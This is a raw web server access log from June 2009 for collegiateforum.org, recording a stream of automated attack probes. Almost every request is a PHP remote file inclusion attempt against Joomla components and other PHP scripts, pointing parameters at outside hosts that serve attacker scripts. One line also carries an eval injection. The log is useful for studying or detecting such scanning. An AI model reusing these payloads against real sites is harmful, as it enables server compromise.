83.13.191.186 - - [29/Jun/2009:05:14:57 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:14:57 -0700] "GET /logs/access_081208.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:15:05 -0700] "GET /logs/access_081208.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
131.203.76.246 - - [29/Jun/2009:05:16:22 -0700] "GET /logs//_conf/_php-core/common-tpl-vars.php?admindir=http://67.222.48.109/images/.ray/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
131.203.76.246 - - [29/Jun/2009:05:16:22 -0700] "GET /logs/access_081215.log//_conf/_php-core/common-tpl-vars.php?admindir=http://67.222.48.109/images/.ray/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
131.203.76.246 - - [29/Jun/2009:05:16:22 -0700] "GET /_conf/_php-core/common-tpl-vars.php?admindir=http://67.222.48.109/images/.ray/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
194.109.22.117 - - [29/Jun/2009:05:17:09 -0700] "GET /logs/?sourcedir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 200 5085 "-" "libwww-perl/5.816" "www.collegiateforum.org"
194.109.22.117 - - [29/Jun/2009:05:17:11 -0700] "GET /?sourcedir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 200 934 "-" "libwww-perl/5.816" "www.collegiateforum.org"
194.109.22.117 - - [29/Jun/2009:05:17:11 -0700] "GET /logs/access.log/?sourcedir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.collegiateforum.org"
174.132.242.42 - - [29/Jun/2009:05:19:37 -0700] "GET / HTTP/1.1" 200 934 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" "www.collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:05:19:42 -0700] "GET /logs/access.log%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:05:19:42 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:05:19:42 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:05:19:48 -0700] "GET /logs/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:05:19:48 -0700] "GET /administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:05:19:48 -0700] "GET /logs/access.log%20/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "collegiateforum.org"
66.155.118.125 - - [29/Jun/2009:05:20:01 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "collegiateforum.org"
66.155.118.125 - - [29/Jun/2009:05:20:01 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "collegiateforum.org"
66.155.118.125 - - [29/Jun/2009:05:20:01 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "collegiateforum.org"
125.248.150.52 - - [29/Jun/2009:05:20:46 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.poelkingbowling.com/help/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
125.248.150.52 - - [29/Jun/2009:05:20:47 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.poelkingbowling.com/help/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
125.248.150.52 - - [29/Jun/2009:05:20:47 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.poelkingbowling.com/help/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:21:24 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:21:24 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:21:24 -0700] "GET /logs/access.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:21:27 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:21:27 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:21:27 -0700] "GET /logs/access.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:05:21:36 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:05:21:44 -0700] "GET /logs/access.log/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "collegiateforum.org"
125.248.150.52 - - [29/Jun/2009:05:23:23 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
125.248.150.52 - - [29/Jun/2009:05:23:23 -0700] "GET /logs//logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
125.248.150.52 - - [29/Jun/2009:05:23:23 -0700] "GET /logs/access.log//logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.221.130.22 - - [29/Jun/2009:05:23:35 -0700] "GET /administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
77.221.130.22 - - [29/Jun/2009:05:23:35 -0700] "GET /logs/access.log/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
77.221.130.22 - - [29/Jun/2009:05:23:35 -0700] "GET /logs/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
125.131.116.12 - - [29/Jun/2009:05:25:07 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ymed.co.kr//upload/index1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:25:38 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:25:38 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:25:38 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
65.23.158.226 - - [29/Jun/2009:05:26:54 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "collegiateforum.org"
65.23.158.226 - - [29/Jun/2009:05:26:54 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "collegiateforum.org"
65.23.158.226 - - [29/Jun/2009:05:26:55 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "collegiateforum.org"
80.247.76.181 - - [29/Jun/2009:05:27:16 -0700] "GET /logs/access_090330.log/?sourcedir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
80.247.76.181 - - [29/Jun/2009:05:27:16 -0700] "GET /logs/?sourcedir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 200 5085 "-" "libwww-perl/5.805" "www.collegiateforum.org"
80.247.76.181 - - [29/Jun/2009:05:27:16 -0700] "GET /?sourcedir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 200 934 "-" "libwww-perl/5.805" "www.collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:05:28:35 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:05:28:35 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:05:28:35 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
65.23.158.226 - - [29/Jun/2009:05:29:58 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "collegiateforum.org"
65.23.158.226 - - [29/Jun/2009:05:29:58 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "collegiateforum.org"
65.23.158.226 - - [29/Jun/2009:05:29:59 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:05:30:14 -0700] "GET /logs/access.log/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:05:30:14 -0700] "GET /administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:05:30:14 -0700] "GET /logs/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
125.248.150.52 - - [29/Jun/2009:05:31:30 -0700] "GET /logs/access.log%20//logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:31:40 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:31:40 -0700] "GET /logs/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:31:40 -0700] "GET /administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
89.186.1.54 - - [29/Jun/2009:05:32:07 -0700] "GET /logs/phphtml.php?htmlclass_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
89.186.1.54 - - [29/Jun/2009:05:32:07 -0700] "GET /phphtml.php?htmlclass_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:32:20 -0700] "GET /administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:32:20 -0700] "GET /logs/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:32:20 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
218.234.21.178 - - [29/Jun/2009:05:32:45 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "collegiateforum.org"
218.234.21.178 - - [29/Jun/2009:05:32:45 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "collegiateforum.org"
218.234.21.178 - - [29/Jun/2009:05:32:45 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:32:47 -0700] "GET /administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:32:47 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:32:47 -0700] "GET /logs/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
218.234.21.178 - - [29/Jun/2009:05:33:14 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "collegiateforum.org"
218.234.21.178 - - [29/Jun/2009:05:33:14 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "collegiateforum.org"
218.234.21.178 - - [29/Jun/2009:05:33:14 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "collegiateforum.org"
89.186.1.54 - - [29/Jun/2009:05:34:42 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "collegiateforum.org"
89.186.1.54 - - [29/Jun/2009:05:34:42 -0700] "GET /phphtml.php?htmlclass_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "collegiateforum.org"
89.186.1.54 - - [29/Jun/2009:05:34:42 -0700] "GET /logs/phphtml.php?htmlclass_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "collegiateforum.org"
119.93.90.155 - - [29/Jun/2009:05:35:02 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
119.93.90.155 - - [29/Jun/2009:05:35:02 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
119.93.90.155 - - [29/Jun/2009:05:35:02 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
59.125.5.1 - - [29/Jun/2009:05:39:02 -0700] "GET /logs/access.log%20%20/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
59.125.5.1 - - [29/Jun/2009:05:39:03 -0700] "GET /logs/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
59.125.5.1 - - [29/Jun/2009:05:39:06 -0700] "GET /includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
119.93.90.155 - - [29/Jun/2009:05:40:11 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
119.93.90.155 - - [29/Jun/2009:05:40:11 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
119.93.90.155 - - [29/Jun/2009:05:40:11 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
193.201.52.162 - - [29/Jun/2009:05:46:36 -0700] "GET /logs//appserv/main.php?appserv_roothttp://stahlstadt.st.funpic.de/testN.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
193.201.52.162 - - [29/Jun/2009:05:46:36 -0700] "GET /logs//appserv/main.php?appserv_roothttp://stahlstadt.st.funpic.de/test99.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
193.201.52.162 - - [29/Jun/2009:05:46:37 -0700] "GET /appserv/main.php?appserv_roothttp://stahlstadt.st.funpic.de/testN.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
193.201.52.162 - - [29/Jun/2009:05:46:37 -0700] "GET /appserv/main.php?appserv_roothttp://stahlstadt.st.funpic.de/test99.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:48:57 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:48:57 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:48:57 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:49:25 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:49:25 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:49:30 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:50:23 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:50:23 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:50:23 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
87.106.179.130 - - [29/Jun/2009:05:50:57 -0700] "GET /logs/access_081208.log/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.179.130 - - [29/Jun/2009:05:50:57 -0700] "GET /logs/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 5085 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.179.130 - - [29/Jun/2009:05:50:57 -0700] "GET /?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 934 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.179.130 - - [29/Jun/2009:05:51:47 -0700] "GET /?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 934 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.179.130 - - [29/Jun/2009:05:51:47 -0700] "GET /logs/access_081208.log/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.179.130 - - [29/Jun/2009:05:51:51 -0700] "GET /logs/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 5085 "-" "libwww-perl/5.805" "www.collegiateforum.org"
